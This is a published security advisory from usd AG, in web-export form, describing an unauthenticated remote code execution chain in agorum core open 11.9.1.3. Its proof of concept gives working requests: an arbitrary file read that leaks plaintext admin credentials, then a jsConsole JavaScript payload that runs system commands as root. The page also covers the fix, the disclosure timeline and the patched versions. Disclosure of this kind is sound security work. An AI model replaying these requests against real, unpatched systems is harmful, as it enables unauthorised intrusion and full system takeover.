{"id":24286,"date":"2025-06-27T16:09:06","date_gmt":"2025-06-27T14:09:06","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0030\/"},"modified":"2025-07-01T10:31:34","modified_gmt":"2025-07-01T08:31:34","slug":"usd-2025-0030","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0030\/","title":{"rendered":"usd-2025-0030"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-0030 | Agorum core open 11.9.1.3-1857 - Unauthenticated Remote Code Execution Chain<\/h1>\n<p><strong>Product<\/strong>: Agorum core open<br \/><strong>Affected Version<\/strong>: 11.9.1.3-1857<br \/><strong>Vulnerability Type<\/strong>: Unauthenticated Remote Code Execution Chain<br \/><strong>Security Risk<\/strong>: Critical<br \/><strong>Vendor<\/strong>: Agorum<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.agorum.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.agorum.com\/<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: Not requested<br \/><strong>CVE Link<\/strong>: Not requested<br \/><strong>Advisory ID<\/strong>: usd-2025-0030<\/p>\n<h3>Description<\/h3>\n<p>Agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. 
It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n<p>Our researchers discovered multiple vulnerabilities in agorum core that, when chained together, allow an unauthenticated attacker to achieve full remote code execution with root privileges. This critical vulnerability chain enables complete system compromise without prior authentication.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The exploit chain consists of three distinct vulnerabilities. The initial entry point, identified as <a href=\"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0022\/\"><strong>usd-2025-0022<\/strong><\/a>, allows unauthenticated attackers to read arbitrary files. By exploiting this flaw, an attacker can retrieve the application's configuration file identified in <a href=\"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0023\/\"><strong>usd-2025-0023<\/strong><\/a>, which contains plaintext credentials for the mainadmin account. 
This can be achieved using the following request:<\/p>\n<p><strong>Request:<\/strong><\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">GET<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/dynawebservices\/wsfiling\/?action=getTemp&amp;tmpFile=\/opt\/agorum\/agorumcore\/doc\/agorum-core-datasheet.txt<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span><\/pre>\n<\/div>\n<p><strong>Response:<\/strong><\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Powered-By<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">agorum core<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: 
#263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">1673<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mon, 05 May 2025 05:45:32 GMT<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Apache-Coyote\/1.1<\/span><\/pre>\n<p>Datasheet agorum core:<br \/>[...]<br \/>Access\/Protocols:<br \/>  Web-Portal (secure): https:\/\/172.17.0.1:443<br \/>  Web-Portal (unsecure): http:\/\/172.17.0.1:81<br \/>  Networkdrive (DMS Filearea): \\\\172.17.0.1\\dms<br \/>  Networkdrive (My area): \\\\172.17.0.1\\private<br \/>  FTP Access: 172.17.0.1:21<br \/>  IMAP-Interface: 172.17.0.1:143<br \/>  SMTP-Interface: 172.17.0.1:2501<br \/>  Mail-Domain: agorumcore.com<br \/>  SMTP-Server: localhost:25<br \/>  SMTP-User:<br \/>  SMTP-Password:<br \/>Access data agorum core:<br \/>  Username (Mainadmin): roi<br \/>  Password (Mainadmin: roi): Changeme123456<br \/>  Username (Demo): demo<br \/>  Password (Demo): demoAccess<br \/>database (mysql):<br \/>  database-Username: root<br \/>  database-Password: Changeme123456<br \/>  database-Host: localhost<br \/>  database-Port: 3306<br \/>[...]<\/p>\n<\/div>\n<p>At this stage, the attacker has successfully escalated privileges to the mainadmin level. 
As identified in <a href=\"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0021\/\"><strong>usd-2025-0021<\/strong><\/a>, users with mainadmin privileges have the ability to execute arbitrary system commands. Since the application runs with root privileges by default, this leads to full system compromise.<\/p>\n<p>Arbitrary command execution can be performed using the jsConsole function via the following request:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/api\/rest\/parse\/jsConsole<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">JSESSIONID=[REDACTED];<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<br 
\/><\/span>js=var%20runCommand%20%3D%20function(cmd)%20%7B%0A%20%20%20%20var%20runtime%20%3D%20java.lang.Runtime.getRuntime()%3B%0A%20%20%20%20var%20process%20%3D%20runtime.exec(cmd)%3B%0A%0A%20%20%20%20var%20reader%20%3D%20new%20java.io.BufferedReader(%0A%20%20%20%20%20%20%20%20new%20java.io.InputStreamReader(process.getInputStream())%0A%20%20%20%20)%3B%0A%0A%20%20%20%20var%20line%3B%0A%20%20%20%20var%20output%20%3D%20%22%22%3B%0A%20%20%20%20while%20((line%20%3D%20reader.readLine())%20!%3D%20null)%20%7B%0A%20%20%20%20%20%20%20%20output%20%2B%3D%20line%20%2B%20%22%5Cn%22%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20reader.close()%3B%0A%20%20%20%20process.waitFor()%3B%0A%20%20%20%20return%20output%3B%0A%7D%3B%0ArunCommand(%22whoami%22)%3B%0A<\/pre>\n<\/div>\n<p>The payload for the <strong>js<\/strong> parameter to execute the <strong>whoami<\/strong> command is as follows:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runCommand<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">function<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">cmd<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">)<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" 
style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runtime<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">java<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">lang<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Runtime<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">getRuntime<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">();<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">process<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runtime<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">exec<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">cmd<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">);<br \/><\/span><span class=\"w\" 
style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">reader<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">new<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">java<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">io<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">BufferedReader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">        <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">new<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">java<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">io<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">InputStreamReader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">process<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">getInputStream<\/span><span 
class=\"p\" style=\"background: #263238;color: #89ddff\">())<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">);<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">line<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">output<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">while<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">((<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">line<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">reader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" 
style=\"background: #263238;color: #bb80b3\">readLine<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">())<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">)<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">        <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">output<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">+=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">line<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">+<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"\\n\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">reader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">close<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">();<br \/><\/span><span class=\"w\" 
style=\"background: #263238;color: #eff\">    <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">process<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">waitFor<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">();<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">output<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">};<br \/><\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runCommand<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"whoami\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">);<\/span><\/pre>\n<\/div>\n<p>The server response will include the output of the executed command:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Powered-By<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">agorum core<br \/><\/span><span 
class=\"na\" style=\"background: #263238;color: #bb80b3\">Access-Control-Allow-Credentials<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">true<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Access-Control-Allow-Origin<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">https:\/\/localhost<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mon, 05 May 2025 05:55:46 GMT<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json;charset=UTF-8<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Apache-Coyote\/1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">145<\/span><\/pre>\n<p><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"success\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">true<\/span><span class=\"p\" style=\"background: #263238;color: 
#89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorClass\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorCode\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorKey\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"message\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"result\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"root\\n\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: 
#ff5370\">\"errorStack\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorMessage\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"executionTime\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">8<br \/><\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}<\/span><\/p>\n<\/div>\n<h3>Fix<\/h3>\n<p>To mitigate this vulnerability chain, we recommend implementing strict authentication and access controls for all sensitive endpoints, especially those exposing file access or administrative functions. Input validation should be enforced to prevent injection attacks, and administrative features like command execution should be disabled by default or restricted to non-root contexts. 
Additionally, sensitive data such as the credentials in configuration files should never be stored in plaintext.<\/p>\n<p>Users of agorum core open can upgrade to 11.9.2 or 11.10.1.<\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-05-05<\/strong>: First contact request via mail.<\/li>\n<li><strong>2025-05-05<\/strong>: The vendor has confirmed the delivery and has begun investigating the matter.<\/li>\n<li><strong>2025-05-07<\/strong>: The vendor has begun addressing and fixing the issue.<\/li>\n<li><strong>2025-05-15<\/strong>: The vendor has addressed and fixed the vulnerability within the cloud instances.<\/li>\n<li><strong>2025-05-30<\/strong>: The vendor released fixed versions 11.9.2 and 11.10.1.<\/li>\n<li><strong>2025-06-27<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-0030 | Agorum core open 11.9.1.3-1857 - Unauthenticated Remote Code Execution Chain Product: Agorum core openAffected Version: 11.9.1.3-1857Vulnerability Type: Unauthenticated Remote Code Execution ChainSecurity Risk: CriticalVendor: AgorumVendor URL: https:\/\/www.agorum.com\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: Not requestedCVE Link: Not requestedAdvisory ID: usd-2025-0030 Description Agorum core is an open-source Enterprise Content Management (ECM) system developed by 
[&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-24286","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=24286"}],"version-history":[{"count":3,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24286\/revisions"}],"predecessor-version":[{"id":24289,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24286\/revisions\/24289"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=24286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}